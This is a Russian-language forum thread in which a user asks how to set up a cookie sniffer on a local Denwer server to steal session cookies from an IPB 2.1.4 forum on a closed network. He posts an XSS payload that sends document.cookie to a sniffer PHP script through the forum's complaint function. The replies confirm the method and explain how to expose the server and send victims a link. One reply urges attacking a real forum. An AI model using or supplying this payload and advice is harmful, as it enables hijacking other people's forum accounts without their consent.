![]() |
Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот сниф как правильно настроить хз :) Спрашивается а зачем тебе локально то :) Да потомучто форум крутится в закрытой сетке в тырнет доступа нет.... Вот вопрочец ещо по xss через функции жалоба <script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> Почему собственно сниф в .php я так понимаю что в версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?! |
А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??
|
ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...
Вобщем как правильно его натроить чтоб перехватывал куки Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?! |
Цитата:
вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее |
теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети
|
Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www в файле .htaccess делаю настройки чтоб порт 80 светился в сетке далее на форуме юзаю данную xss через функции (жалоба) Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки... |
Цитата:
|
ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта
|
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
|
def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки. Dmitry507, ты что-то странное куришь) бросай0)) |
| Время: 06:48 |